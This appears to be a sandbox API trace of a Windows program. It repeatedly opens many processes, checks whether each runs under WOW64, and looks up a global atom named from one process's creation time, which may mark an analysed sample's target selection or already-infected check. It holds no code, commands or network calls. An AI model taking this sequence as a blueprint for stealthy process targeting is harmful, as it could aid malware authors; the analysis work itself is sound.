	[0105.940] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.940] CloseHandle (hObject=0x694) returned 1
	[0105.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0105.940] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.940] CloseHandle (hObject=0x694) returned 1
	[0105.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0105.940] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.940] CloseHandle (hObject=0x694) returned 1
	[0105.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0105.941] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.941] CloseHandle (hObject=0x694) returned 1
	[0105.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0105.941] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.941] CloseHandle (hObject=0x694) returned 1
	[0105.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0105.941] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.941] CloseHandle (hObject=0x694) returned 1
	[0105.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0105.941] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.941] CloseHandle (hObject=0x694) returned 1
	[0105.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0105.942] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.942] CloseHandle (hObject=0x694) returned 1
	[0105.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0105.942] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.942] CloseHandle (hObject=0x694) returned 1
	[0105.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.942] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.942] CloseHandle (hObject=0x694) returned 1
	[0105.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.942] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.943] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0105.943] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0105.943] wsprintfA (in: param_1=0x3993c40, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0105.943] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.943] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0105.943] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.944] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0105.944] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0105.944] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0105.944] CloseHandle (hObject=0x694) returned 1
	[0105.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0105.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0105.944] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.944] CloseHandle (hObject=0x694) returned 1
	[0105.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0105.944] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.944] CloseHandle (hObject=0x694) returned 1
	[0105.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0105.944] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.944] CloseHandle (hObject=0x694) returned 1
	[0105.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0105.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0105.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0105.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0105.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0105.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0105.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0105.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0105.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0105.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0105.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0105.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0105.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0105.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0105.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0105.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0105.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0105.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0105.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0105.985] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.985] CloseHandle (hObject=0x694) returned 1
	[0105.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0105.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0105.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0105.986] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.986] CloseHandle (hObject=0x694) returned 1
	[0105.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0105.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0105.986] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.986] CloseHandle (hObject=0x694) returned 1
	[0105.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0105.986] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.986] CloseHandle (hObject=0x694) returned 1
	[0105.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0105.986] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.987] CloseHandle (hObject=0x694) returned 1
	[0105.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0105.987] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.987] CloseHandle (hObject=0x694) returned 1
	[0105.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0105.987] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.987] CloseHandle (hObject=0x694) returned 1
	[0105.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0105.987] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.987] CloseHandle (hObject=0x694) returned 1
	[0105.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0105.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0105.987] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.987] CloseHandle (hObject=0x694) returned 1
	[0105.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0105.988] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.988] CloseHandle (hObject=0x694) returned 1
	[0105.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0105.988] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.988] CloseHandle (hObject=0x694) returned 1
	[0105.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0105.988] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.988] CloseHandle (hObject=0x694) returned 1
	[0105.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0105.988] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.988] CloseHandle (hObject=0x694) returned 1
	[0105.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0105.989] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.989] CloseHandle (hObject=0x694) returned 1
	[0105.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0105.989] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.989] CloseHandle (hObject=0x694) returned 1
	[0105.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0105.989] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.989] CloseHandle (hObject=0x694) returned 1
	[0105.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0105.989] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.989] CloseHandle (hObject=0x694) returned 1
	[0105.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0105.989] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.989] CloseHandle (hObject=0x694) returned 1
	[0105.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0105.990] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.990] CloseHandle (hObject=0x694) returned 1
	[0105.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0105.990] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.990] CloseHandle (hObject=0x694) returned 1
	[0105.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0105.990] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.990] CloseHandle (hObject=0x694) returned 1
	[0105.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0105.990] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.990] CloseHandle (hObject=0x694) returned 1
	[0105.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0105.990] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.990] CloseHandle (hObject=0x694) returned 1
	[0105.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0105.991] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.991] CloseHandle (hObject=0x694) returned 1
	[0105.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0105.991] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.991] CloseHandle (hObject=0x694) returned 1
	[0105.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0105.991] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.991] CloseHandle (hObject=0x694) returned 1
	[0105.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0105.991] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.991] CloseHandle (hObject=0x694) returned 1
	[0105.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0105.991] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.991] CloseHandle (hObject=0x694) returned 1
	[0105.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0105.992] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.992] CloseHandle (hObject=0x694) returned 1
	[0105.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0105.992] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.992] CloseHandle (hObject=0x694) returned 1
	[0105.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.992] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.992] CloseHandle (hObject=0x694) returned 1
	[0105.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.993] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.993] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0105.993] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0105.993] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0105.993] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.993] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0105.994] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.994] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0105.994] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0105.994] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0105.994] CloseHandle (hObject=0x694) returned 1
	[0105.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0105.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0105.994] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.994] CloseHandle (hObject=0x694) returned 1
	[0105.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0105.994] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.994] CloseHandle (hObject=0x694) returned 1
	[0105.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0105.995] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.995] CloseHandle (hObject=0x694) returned 1
	[0106.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0106.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0106.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0106.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0106.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0106.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0106.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0106.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0106.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0106.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0106.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0106.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0106.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0106.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0106.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0106.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0106.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0106.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0106.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0106.040] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.040] CloseHandle (hObject=0x694) returned 1
	[0106.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0106.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0106.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0106.040] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.040] CloseHandle (hObject=0x694) returned 1
	[0106.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0106.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0106.040] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.040] CloseHandle (hObject=0x694) returned 1
	[0106.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0106.041] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.041] CloseHandle (hObject=0x694) returned 1
	[0106.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0106.041] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.041] CloseHandle (hObject=0x694) returned 1
	[0106.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0106.041] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.041] CloseHandle (hObject=0x694) returned 1
	[0106.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0106.041] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.041] CloseHandle (hObject=0x694) returned 1
	[0106.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0106.041] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.041] CloseHandle (hObject=0x694) returned 1
	[0106.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0106.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0106.042] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.042] CloseHandle (hObject=0x694) returned 1
	[0106.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0106.042] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.042] CloseHandle (hObject=0x694) returned 1
	[0106.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0106.042] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.042] CloseHandle (hObject=0x694) returned 1
	[0106.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0106.042] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.042] CloseHandle (hObject=0x694) returned 1
	[0106.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0106.043] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.043] CloseHandle (hObject=0x694) returned 1
	[0106.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0106.043] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.043] CloseHandle (hObject=0x694) returned 1
	[0106.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0106.043] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.043] CloseHandle (hObject=0x694) returned 1
	[0106.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0106.043] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.043] CloseHandle (hObject=0x694) returned 1
	[0106.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0106.043] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.043] CloseHandle (hObject=0x694) returned 1
	[0106.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0106.044] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.044] CloseHandle (hObject=0x694) returned 1
	[0106.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0106.044] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.044] CloseHandle (hObject=0x694) returned 1
	[0106.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0106.044] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.044] CloseHandle (hObject=0x694) returned 1
	[0106.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0106.044] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.044] CloseHandle (hObject=0x694) returned 1
	[0106.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0106.044] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.044] CloseHandle (hObject=0x694) returned 1
	[0106.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0106.045] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.045] CloseHandle (hObject=0x694) returned 1
	[0106.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0106.045] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.045] CloseHandle (hObject=0x694) returned 1
	[0106.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0106.045] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.045] CloseHandle (hObject=0x694) returned 1
	[0106.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0106.045] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.045] CloseHandle (hObject=0x694) returned 1
	[0106.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0106.045] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.045] CloseHandle (hObject=0x694) returned 1
	[0106.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0106.046] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.046] CloseHandle (hObject=0x694) returned 1
	[0106.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0106.046] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
